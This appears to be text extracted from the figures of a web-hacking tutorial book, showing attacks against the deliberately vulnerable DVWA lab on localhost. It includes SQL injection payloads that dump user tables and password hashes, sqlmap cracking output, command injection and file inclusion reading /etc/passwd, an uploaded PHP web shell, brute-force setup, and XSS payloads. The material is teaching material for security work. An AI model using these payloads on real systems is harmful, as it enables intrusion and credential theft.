The document discusses tools and techniques for attacking websites. It covers topics like information gathering, vulnerability scanning, exploitation, and web application attacks. The goal is to educate readers about common hacking methods so they can better defend their systems.
1. THE BASICS OF WEB HACKING
Tools and Techniques to Attack the Web
Josh Paul
2. AMSTERDAM • BOSTON • HEIDELBERG • LONDON • NEW YORK • OXFORD • PARIS • SAN DIEGO • SAN FRANCISCO • SINGAPORE • SYDNEY • TOKYO
ELSEVIER Syngress is an imprint of Elsevier
8. Working together to grow libraries in developing countries
www.elsevier.com • www.bookaid.org
33. [Screenshots: a text editor "Save As" dialog saving the Damn Vulnerable Web App installer script as DVWA_install.sh (character encoding UTF-8, line ending Unix/Linux); the Damn Vulnerable Web App (DVWA) login page in Mozilla Firefox with the username admin entered]
34. [Screenshot: DVWA database setup page]
If the database already exists, it will be cleared and the data will be reset.
Backend Database: MySQL
Create / Reset Database
Database has been created.
'users' table was created.
Data inserted into 'users' table.
'guestbook' table was created.
Data inserted into 'guestbook' table.
Setup successful!
35. DVWA Security
Script Security
Security Level is currently low.
You can set the security level to low, medium or high.
The security level changes the vulnerability level of DVWA.
[Controls: security level drop-down set to low, Submit button]
40. [Screenshot: the Dakota State University website loaded in a browser by IP address, with navigation tabs for Future Students, Current Students, Faculty/Staff and Parents/Family]
49. [Screenshot: Nessus vulnerability scanner, scan listing with the columns Scan Title, Created By, Start Time and Status, showing one scan of localhost]
63. [Screenshots: BackTrack applications menu with categories including Information Gathering, Vulnerability Assessment, Exploitation Tools and Reverse Engineering, opened to Web Application Assessment; Firefox Preferences, Advanced tab (General, Network, Update, Encryption), Network > Connection: "Configure how Firefox connects to the Internet", Settings... button]
66. [Screenshot: Burp Suite free edition v1.4]
68. [Screenshot: Burp Suite free edition v1.4, spider tab, options]
settings
check robots.txt
detect custom "not found" responses
ignore links to non-text content
request the root of all directories
make a non-parameterised request to each dynamic page
maximum link depth:
monitor burp proxy traffic
passively spider as you browse
link depth to associate with proxy requests: 0
69. [Screenshot: Burp spider options, form submission]
forms
individuate forms by: action URL, method and fields
don't submit forms
prompt for guidance
automatically submit using the following rules to assign parameter values:
[Rule table with columns match type, field name and field value; regex rules for mail (wiener@example.com), first (Peter), last (wiener), name (Peter Wiener), comp (Wiener Consulting) and addr (Main Street); buttons add, edit, remove, up, down]
set unmatched fields to: 555-555-0199@example.com
iterate all values of submit fields - max submissions per form: 10
73. [Screenshots: BackTrack applications menu opened to Vulnerability Assessment > Web Application Assessment > Web Vulnerability Scanners, listing burpsuite and owasp-zap among the tools; OWASP ZAP first-run dialog]
OWASP ZAP
SSL Root CA certificate
SSL won't work if you haven't created and imported an OWASP ZAP CA root certificate. You can create such a certificate any time in the options menu, so you do not have to create it right now.
Gener...: Go to options panel and create certificate now.
Later: Not now, but create certificate later.
75. [Screenshots: OWASP ZAP "Untitled Session" window with the Sites tree and the right-click Attack menu (Active Scan site, Active Scan node, Spider site, Brute Force site, Port scan host); Spider tab for site 127.0.0.1 listing "URI found during crawl" and "URI found but out of crawl scope"; Active Scan tab for site 127.0.0.1 listing GET requests to randomly named .php paths, each answered with 404 Not Found in a few milliseconds]
76. [Screenshot: OWASP ZAP Alerts tab]
Alerts: SQL Injection Fingerprinting (4), SQL Injection (4), Directory Browsing (7), Cookie set without HttpOnly flag, Password Autocomplete in browser
Selected alert: SQL Injection Fingerprinting
Risk: High
Reliability: Suspicious
Parameter: the login form's username, password and Login fields
Description: SQL injection may be possible.
Affected URLs include http://127.0.0.1/login.php and http://127.0.0.1/setup.php
77. [Screenshot: Save dialog, saving the report to the Desktop with File Name ZAP.html and Files of Type ASCII HTML file]
78. [Screenshot: OWASP ZAP Brute Force tab run against site 127.0.0.1:80 with the directory-list-2.3-small.txt list, showing discovered paths and their response codes (200 OK or 302 Found), among them /external/phpids/, /icons/, /index/, /instructions/, /login/, /logout/, /security/, /setup/ and entries under /vulnerabilities/ such as brute/, exec/, fi/, sqli/, upload/, view_help.php and view_source.php]
79. Active scanning wizard
Actively scanning multiple items
You have selected 71 items for active scanning. Before continuing, you can use the filters below to remove certain categories of items, to make your scanning more targeted and efficient.
remove duplicate items (same URL and parameters) [2 items]
remove items already scanned (same URL and parameters) [35 items]
remove out-of-scope items [22 items]
remove items with media responses [0+ items]
remove items with the following extensions [0 items]: js,gif,jpg,png,css
Note: Some of the selected items do not yet have responses. If you choose to remove items with media responses, some of these items may be removed from the scan when their responses have been analysed.
cancel / next
80. [Screenshot: Burp Suite Professional v1.2, scanner tab, scan queue listing queued https://www.my... URLs (contacts, creditcards, employees, filexchange, prefs, search) with columns for status (percentage complete, finished, waiting), issues, requests, errors and insertion points]
81. [Screenshot: Burp scanner result for www.myapp.com/login/102/Default.aspx, advisory tab]
SQL injection
Issue: SQL injection
Severity: High
Confidence: Certain
Host: https://www.myapp.com
Path: /login/102/Default.aspx
Issue detail
The username parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
82. [Screenshot: Burp Suite Professional v1.2, scanner tab, results]
Issues for https://www.myapp.com:
SQL injection [4]
HTTP header injection
Cross-site scripting (reflected): /search/.../Default.aspx [SearchTerm parameter]
LDAP injection
Open redirection
Password field with autocomplete enabled
SSL cookie without secure flag set
Cookie without HttpOnly flag set
Cacheable HTTPS response
HTML does not specify charset [2]
Site tree: admin, contacts, creditcards, default.html, employees, filexchange, news, prefs, search
Selected issue (advisory tab):
Issue: Cross-site scripting (reflected)
Severity: High
Confidence: Certain
Host: https://www.myapp.com
Path: /search/12/Default.aspx
87. Welcome to Damn Vulnerable Web App!
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
WARNING!
Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.
Disclaimer
We do not take responsibility for the way in which any one uses this application. We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility, it is the responsibility of the person/s who uploaded and installed it.
General Instructions
The help button allows you to view hints/tips for each vulnerability and for each security level on their respective page.
[Side menu: Home, Instructions, Setup, Brute Force, Command Execution, CSRF, File Inclusion, SQL Injection, SQL Injection (Blind), Upload, XSS reflected, XSS stored, DVWA Security, PHP Info, About, Logout]
89. Vulnerability: SQL Injection
User ID: [input field] Submit
ID: Rellk' or 'a'='a
First name: admin
Surname: admin
ID: Rellk' or 'a'='a
First name: Gordon
Surname: Brown
ID: Rellk' or 'a'='a
First name: Hack
Surname: Me
ID: Rellk' or 'a'='a
First name: Pablo
Surname: Picasso
ID: Rellk' or 'a'='a
First name: Bob
Surname: Smith
90. [Screenshot: Burp Suite free edition v1.4.01, proxy tab, intercept; request to http://127.0.0.1:80; intercept is on; params view]
GET request to /vulnerabilities/sqli/
type | name | value
URL | id | Rellk%27+or+%27a%27%3D%27a
URL | Submit | Submit
cookie | PHPSESSID | [illegible]
cookie | security | low
92. User ID: [input field] Submit
ID: Rellk' or 1=1 union select null, database() #
First name: admin
Surname: admin
ID: Rellk' or 1=1 union select null, database() #
First name: Gordon
Surname: Brown
ID: Rellk' or 1=1 union select null, database() #
First name: Hack
Surname: Me
ID: Rellk' or 1=1 union select null, database() #
First name: Pablo
Surname: Picasso
ID: Rellk' or 1=1 union select null, database() #
First name: Bob
Surname: Smith
ID: Rellk' or 1=1 union select null, database() #
First name:
Surname: dvwa
[Second screenshot]
ID: Rellk' and 1=1 union select null, table_name from information_schema.tables #
First name:
Surname: guestbook
ID: Rellk' and 1=1 union select null, table_name from information_schema.tables #
First name:
Surname: users
ID: Rellk' and 1=1 union select null, table_name from information_schema.tables #
First name:
Surname: columns_priv
ID: Rellk' and 1=1 union select null, table_name from information_schema.tables #
First name:
Surname: db
ID: Rellk' and 1=1 union select null, table_name from information_schema.tables #
First name:
Surname: event
93. User ID: [input field] Submit
ID: Rellk' and 1=1 union select null, concat(table_name,0x0a,column_name)
First name:
Surname: users
user_id
ID: Rellk' and 1=1 union select null, concat(table_name,0x0a,column_name)
First name:
Surname: users
first_name
ID: Rellk' and 1=1 union select null, concat(table_name,0x0a,column_name)
First name:
Surname: users
last_name
ID: Rellk' and 1=1 union select null, concat(table_name,0x0a,column_name)
First name:
Surname: users
user
ID: Rellk' and 1=1 union select null, concat(table_name,0x0a,column_name)
First name:
Surname: users
password
ID: Rellk' and 1=1 union select null, concat(table_name,0x0a,column_name)
First name:
Surname: users
avatar
94. User ID: [input field] Submit
ID: Rellk' and 1=1 union select null, concat(user,0x0a,password) from users #
[Five result rows, each with an empty First name and a Surname field holding a user name (admin, gordonb, 1337, pablo, smithy) followed on the next line by that user's password hash]
95. [Screenshot: gedit, "Unsaved Document 1", containing the five user:hash pairs (admin, gordonb, 1337, pablo, smithy), one per line]
97. [Screenshot: Burp Suite free edition v1.4.01, proxy intercept, raw view of the request GET /vulnerabilities/sqli/?id=1&Submit=Submit to host 127.0.0.1, including its PHPSESSID and security cookies]
[Terminal output]
[18:48:35] [INFO] the back-end DBMS is MySQL
[18:48:35] [INFO] fetching banner
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0
banner: '5.1.41-3ubuntu12.10'
98. [18:48:35] [INFO] fetching current database
current database: 'dvwa'
[19:02:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+
99. [19:05:58] [INFO] postprocessing table dump
Database: dvwa
Table: users
[5 entries]
[Table dump with the columns password, user and user_id: five rows, beginning with admin, gordonb and 1337, each showing a password hash followed by the recovered plaintext in parentheses: password, abc123, charley, letmein, password]
101. Vulnerability: Command Execution
Ping for FREE
Enter an IP address below:
[Screenshot output: ping results for 127.0.0.1, 3 packets transmitted, 3 received]
102. Ping for FREE
Enter an IP address below:
[Screenshots: two further results from the ping form. In the first, the ping output for 127.0.0.1 is followed by a directory listing (help, index.php, source). In the second, the ping output for 127.0.0.1 is followed by the contents of /etc/passwd.]
104. Vulnerability: File Upload
Choose an image to upload:
[Screenshots: DVWA upload page with the file chooser open on the root user's folder, listing Desktop, 500worst-passwords.txt, DVWA_install.sh, dvwa_users.txt, localhost-check.nessus and Shell_v0_7.php; a root@bt terminal]
root@bt:/# find / -name Shell_v0_7.php
/root/Shell_v0_7.php
/var/www/hackable/uploads/Shell_v0_7.php
/tmp/VMwareDnD/da6c24a6/Shell_v0_7.php
root@bt:/#
105. [Screenshot: "Command Shell - 127.0.0.1" open in Mozilla Firefox at the uploaded Shell_v0_7.php on 127.0.0.1; Ajax/PHP Command Shell page with the actions [Execute command] [Upload file] [Change directory] [File browser] [Create File], a command history pane, and a Quick Commands menu: Clear screen, Clear history, Can I function?, Get server info, Read /etc/passwd, Open ports, Running processes, Readme, About]
106. [Screenshots: "Command Shell - 127.0.0.1" in Mozilla Firefox, two command sessions]
www-data-# netstat -an | grep -i listen
[Output: tcp sockets in the LISTEN state, including 127.0.0.1:7337, 127.0.0.1:3306 and 0.0.0.0:80]
www-data-# ls
Shell_v0_7.php
dvwa_email.png
www-data-# mkdir goats
www-data-# ls
Shell_v0_7.php
dvwa_email.png
goats
www-data-# cd goats
Current directory changed to goats
www-data-# touch bah.txt
www-data-# ls
bah.txt
107.
108.
109.
110.
111. Vulnerability: Brute Force
[Screenshot: DVWA Brute Force login form (Username, Password, Login).]
[Screenshot: Burp Suite Proxy, intercept tab, intercept is on. Request to http://127.0.0.1:80, GET request to /vulnerabilities/brute/]
type    name       value
URL     username   corndogs
URL     password   sureareyummy
URL     Login      Login
cookie  PHPSESSID  m7cOuorvtemesgddjbv5oj4ue2
cookie  security   low
112. [Screenshot: Burp Suite Proxy, history tab. The list mixes Firefox safebrowsing requests with requests to http://127.0.0.1, including GET /vulnerabilities/brute/?username=corndogs&password=sureareyummy... The params view of the selected request shows the same values as the intercepted request: username corndogs, password sureareyummy, Login Login, and the PHPSESSID and security (low) cookies.]
113. [Screenshot: Burp Suite Proxy history, context menu on the /vulnerabilities/brute/ request. Menu items: remove item from scope, spider from here, actively scan this, send to intruder, send to repeater, send to sequencer, send to comparer (request), send to comparer (response), show response in browser, request in browser, engagement tools [pro version only], show new history window, add comment, highlight, delete this item, clear history, copy URL, copy links in item, save item.]
[Screenshot: Burp Intruder, positions tab. Attack type: sniper. 5 payload positions.]
GET /vulnerabilities/brute/?username=§corndogs§&password=§sureareyummy§&Login=§Login§ HTTP/1.1
Host: 127.0.0.1
[The remaining request headers follow; the other two payload positions mark the PHPSESSID and security cookie values.]
114.
115. [Screenshot: gedit editing dvwa_users.txt, which contains:]
admin
gordonb
1337
pablo
smithy
[Screenshot: Burp Intruder, payloads tab. Payload Sets: "You can define one or more payload sets. The number of payload sets depends on the attack ..." Payload count: 2 (approx). Request count: 0. Payload type: Runtime file. Payload Options (Runtime file): "This payload type lets you configure a file from which to read payload strings at runtime." Selected file: dvwa_users.txt]
119. [Screenshot: Burp Sequencer, token location within response. Token location capture options: cookie, form field, manual selection (selected). The sample response is an HTTP/1.1 200 OK from an Apache server that sets BBC cookies, including BBC-UID. Token starts: at expression / at offset. Token ends: at delimiter / at fixed length. Button: start capture.]
120. Overall result
The overall quality of randomness within the sample is estimated to be: excellent. At a significance level of 1%, the amount of effective entropy is estimated to be: [illegible] bits.
Effective entropy
The chart shows the number of bits of effective entropy at each significance level, based on all tests. Each significance level defines a minimum probability of the observed results occurring if the sample is randomly generated. When the probability of the observed results occurring falls below this level, the hypothesis that the sample is randomly generated is rejected. Using a lower significance level means that stronger evidence is required to reject the hypothesis that the sample is random, and so increases the chance that non-random data will be treated as random.
[Chart: significance level against number of bits of entropy]
Reliability
The analysis is based on a sample of [illegible] tokens. Based on the sample size, the reliability of the results is: reasonable.
Note that statistical tests provide only an indicative guide to the randomness of the sampled data. Results obtained may contain false positives and negatives, and may not correspond to the practical predictability of the tokens sampled.
123. [Diagram: directory tree rooted at /, with branches bin, etc, var and usr. etc holds the passwd file; var holds lib and www; www holds dvwa, which contains css, images, includes and js.]
124. [Screenshot: terminal, root@bt. The session moves from the root user's home directory to /, /var, /var/www and /var/www/dvwa, running ls at each step.]
root@bt:~# ls
Desktop  DVWA_install.sh  localhost-check.nbe  ZAp.html
root@bt:~# cd ../
root@bt:/# ls
[Listing of /, including bin, boot, cdrom, dev, etc, home, lib, lost+found, media, mnt, opt, pentest, proc, root, sbin, selinux, srv, sys, usr, var]
root@bt:/# cd var
root@bt:/var# ls
[Listing of /var, including backups, cache, lib, local, log, opt, run, spool, www]
root@bt:/var# cd www
root@bt:/var/www# ls
about.php  CHANGELOG.txt  config  COPYING.txt  docs  dvwa  external  favicon.ico  hackable  ids  index.php  instructions.php  login.php  logout.php  log.php  php.ini  phpinfo.php  README.txt  robots.txt  security.php  setup.php  vulnerabilities  wstool
root@bt:/var/www# cd dvwa
root@bt:/var/www/dvwa# ls
css  images  includes  js
root@bt:/var/www/dvwa#
125. [Screenshot: Firefox showing "Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: File Inclusion" at 127.0.0.1. The contents of /etc/passwd are printed across the top of the page, above the DVWA menu.]
126.
127.
128.
129.
130.
131.
132.
133.
134. [Diagram: reflected XSS attack flow between User, Hacker and Web application]
1. Log in
2. Send malicious link
3. Send malicious request
4. Respond with malicious script
5. Malicious script executes
6. Cookie is sent
7. Masquerade as victim
135. Vulnerability: Reflected Cross Site Scripting (XSS)
[Screenshot: DVWA "What's your name?" form with a JavaScript alert box reading "JRod was here!" and an OK button; "Hello" is printed on the page.]
[Screenshot: Burp Proxy options, "intercept server responses" rules: content type matches ..., request was modified, request was intercepted, response code does not match "304", URL is in target scope; "update Content-Length" option.]
136. [Screenshot: Burp Proxy, params view. GET request to /vulnerabilities/xss_r/; the URL parameter name carries the URL-encoded <script>alert("JRod was here!")</script> payload; cookies PHPSESSID and security (low).]
[Screenshot: Burp Proxy, intercepted response from http://127.0.0.1:80/vulnerabilities/xss_r/?name=... The returned HTML reflects the script unescaped:]
<div class="body_padded">
<h1>Vulnerability: Reflected Cross Site Scripting (XSS)</h1>
<div class="vulnerable_code_area">
<form name="XSS" action="#" method="GET">
<p>What's your name?</p>
<input type="text" name="name">
<input type="submit" value="Submit">
</form>
<pre>Hello <script>alert("JRod was here!")</script></pre>
</div>
137. [Screenshot: Burp Decoder. Input: <script>alert("JRod was here!")</script>. The "encode as ..." menu lists plain, url, html, base64, ascii hex, hex, octal and binary. Output: the URL-encoded (%xx) form of the same string.]
138. [Screenshot: Burp Proxy, intercept tab, intercept is on. Request to http://127.0.0.1:80, GET request to /vulnerabilities/xss_r/; the URL parameter name holds the URL-encoded payload; cookies PHPSESSID and security (low).]
[Screenshot: Firefox showing the DVWA page with name=<script>alert("JRod was here!")</script> in the address bar.]
140. [Diagram: stored XSS attack flow between User, Hacker and Web application]
1. Plant stored XSS attack
2. View vulnerable page while authenticated
3. Respond with malicious script
4. Malicious script executes
5. Cookie is sent
Masquerade as victim
141. Vulnerability: Stored Cross Site Scripting (XSS)
[Screenshot: DVWA guestbook form with <script>alert("The Feds are watching me")</script> entered in the Name field.]
[Screenshot: the same page after submission; an alert box reads "The Feds are watching me" with an OK button. Stored entries below the form:]
Name: test
Message: This is a test comment.
Name: Dave
Message: I like hugs
Name: Kenh
Message:
142.
143. The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
144.
145.
146.
147.
148.
149. twitter
Twitter is over capacity.